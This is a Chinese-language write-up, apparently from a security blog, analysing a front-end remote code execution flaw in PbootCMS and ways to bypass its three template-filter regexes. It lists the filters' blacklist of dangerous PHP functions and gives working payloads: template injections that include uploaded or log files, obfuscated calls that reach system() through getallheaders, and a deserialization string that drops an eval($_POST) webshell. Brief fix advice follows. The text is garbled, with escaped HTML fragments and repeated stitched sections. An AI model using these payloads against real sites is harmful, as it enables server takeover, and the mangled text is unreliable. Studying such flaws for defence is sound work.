PbootCMS 前台 RCE 漏洞分析与绕过技术详解<\/h1>

漏洞概述<\/h2>
PbootCMS 最新版本存在前台远程代码执行（RCE）漏洞，攻击者无需管理员权限即可利用该漏洞在目标系统上执行任意 PHP 代码。该漏洞源于模板解析过程中的安全过滤机制存在缺陷，导致攻击者可以绕过多重正则表达式过滤实现代码执行。<\/p>

漏洞背景<\/h2>

PbootCMS 历史上存在多个安全漏洞，包括：<\/p>

3.0.1 版本的 RCE 漏洞<\/li>
文件上传后缀修改导致的 getshell 漏洞（需要管理员密码）<\/li>

3.0.2 版本前可通过文件上传结合包含漏洞实现前台 getshell<\/li> <\/ul>

安全防护机制分析<\/h2>
PbootCMS 设置了三个关键的正则表达式过滤机制：<\/p>

第一个正则<\/h3>
`\{pboot:if$([^}^\$]+)$\}([\s\S]*?)\{\\/pboot:if\}<\/code><\/p>`
`限制<\/strong>：if 语句中不能出现 }<\/code>、^<\/code>、$<\/code> 这三个字符<\/p>`

第二个正则<\/h3> ([\w]+)([\x00-\x1F\x7F\\/\*\<\>\%\w\s\\\\]+)?\(<\/code><\/p> 限制<\/strong>：严格限制函数调用，几乎阻止了所有常规函数调用方式<\/p> 第三个正则（黑名单）<\/h3> 过滤以下关键词：<\/p> $_GET[ $_POST[ $_REQUEST[ $_COOKIE[ $_SESSION[ file_put_contents file_get_contents fwrite phpinfo base64 ` shell_exec eval assert system exec passthru pcntl_exec popen proc_open print_r print urldecode chr include request __FILE__ __DIR__ copy call_user_ preg_replace array_map array_reverse array_filter getallheaders get_headers decode_string htmlspecialchars session_id <\/code><\/pre> 漏洞利用技术<\/h2> 1. 文件包含利用（3.0.2 版本前）<\/h3> 前提<\/strong>：存在文件上传点（如用户头像上传）<\/p> Payload<\/strong>:<\/p> {pboot<\/span>:<\/span>if<\/span>(1<\/span>)require<\/span> "\/var\/www\/html\/static\/upload\/image\/xxxxxxx\/1531651052463520.png"<\/span>;\/\/)}sdfsd{\/pboot:if} <\/span><\/span><\/span><\/code><\/pre>替代方案<\/strong>：包含日志文件<\/p> {pboot<\/span>{user<\/span>:<\/span>password<\/span>}:<\/span>if<\/span>(1<\/span>)require<\/span>+<\/span>\app\home\controller\ParserController<\/span>::<\/span>parserMemberLabel<\/span>('\/Applications\/MAMP\/htdocs\/1.php'<\/span>);\/\/)}sdfsd{\/pboot:if} <\/span><\/span><\/span><\/code><\/pre>2. 正则绕过技术<\/h3> 第一个正则绕过<\/h4> 利用双写替换机制：<\/p> 将 pboot:if<\/code> 写为 pboot{user:password}:if<\/code><\/li> 系统会识别正则并替换为空，最终还原为 pboot:if<\/code><\/li> <\/ul> 第二个正则绕过<\/h4> 利用 PHP 动态函数调用特性：<\/p> (~<\/span>urldecode<\/span>("%8c%86%8c%8b%9a%92"<\/span>))(~<\/span>urldecode<\/span>("%88%97%90%9e%92%96"<\/span>)); <\/span><\/span><\/code><\/pre>（注：3.0.4 版本因 htmlspecialchars<\/code> 处理不可见字符导致此方法失效）<\/p> 第三个正则绕过<\/h4> 使用点号分隔函数名：<\/p> {pboot<\/span>{user<\/span>:<\/span>password<\/span>}:<\/span>if<\/span>(1<\/span>)(sys<\/span>.<\/span>tem<\/span>)(((ne<\/span>.<\/span>xt<\/span>)((getallheade<\/span>.<\/span>rs<\/span>)())));;\/\/)}sdfsd{\/pboot:if} <\/span><\/span><\/span><\/code><\/pre>3. 反序列化利用（签到题预期解法）<\/h3> O<\/span>:<\/span>1<\/span>:<\/span>"B"<\/span>:<\/span>3<\/span>:<\/span>{s<\/span>:<\/span>7<\/span>:<\/span>"content"<\/span>;s<\/span>:<\/span>31<\/span>:<\/span>"<?php echo 1;eval(<\/span>$_POST[a]<\/span>);?>"<\/span>;s<\/span>:<\/span>8<\/span>:<\/span>"filename"<\/span>;s<\/span>:<\/span>5<\/span>:<\/span>"1.php"<\/span>;s<\/span>:<\/span>6<\/span>:<\/span>"decade"<\/span>;O<\/span>:<\/span>3<\/span>:<\/span>"pdo"<\/span>:<\/span>0<\/span>:<\/span>{};} <\/span><\/span><\/code><\/pre>利用 fatal error 导致后续代码停止执行但 destruct 方法仍会执行的特性。<\/p> 修复建议<\/h2> 严格匹配标签后才执行解析，破坏标签结构体（如将 {<\/code> 替换为 &#123<\/code>）<\/li> 更新至最新版本并检查所有用户输入过滤<\/li> 实现更严格的函数调用限制<\/li> 审查文件包含和反序列化操作的安全性<\/li> <\/ol> 相关扩展<\/h2> 类似漏洞也存在于 zzzcms 1.8.4 版本中，其过滤列表存在缺陷（未过滤反引号等关键字符）。<\/p>

PbootCMS 前台 RCE 漏洞分析与绕过技术详解<\/h1>

安全防护机制分析<\/h2> PbootCMS 设置了三个关键的正则表达式过滤机制：<\/p>

第一个正则<\/h3> \{pboot:if$([^}^\$]+)$\}([\s\S]*?)\{\\/pboot:if\}<\/code><\/p> 限制<\/strong>：if 语句中不能出现 }<\/code>、^<\/code>、$<\/code> 这三个字符<\/p>

漏洞利用技术<\/h2>

2. 正则绕过技术<\/h3>

相关扩展<\/h2> 类似漏洞也存在于 zzzcms 1.8.4 版本中，其过滤列表存在缺陷（未过滤反引号等关键字符）。<\/p>

安全防护机制分析<\/h2>
PbootCMS 设置了三个关键的正则表达式过滤机制：<\/p>

第一个正则<\/h3>
`\{pboot:if$([^}^\$]+)$\}([\s\S]*?)\{\\/pboot:if\}<\/code><\/p>`
`限制<\/strong>：if 语句中不能出现 }<\/code>、^<\/code>、$<\/code> 这三个字符<\/p>`

相关扩展<\/h2>
类似漏洞也存在于 zzzcms 1.8.4 版本中，其过滤列表存在缺陷（未过滤反引号等关键字符）。<\/p>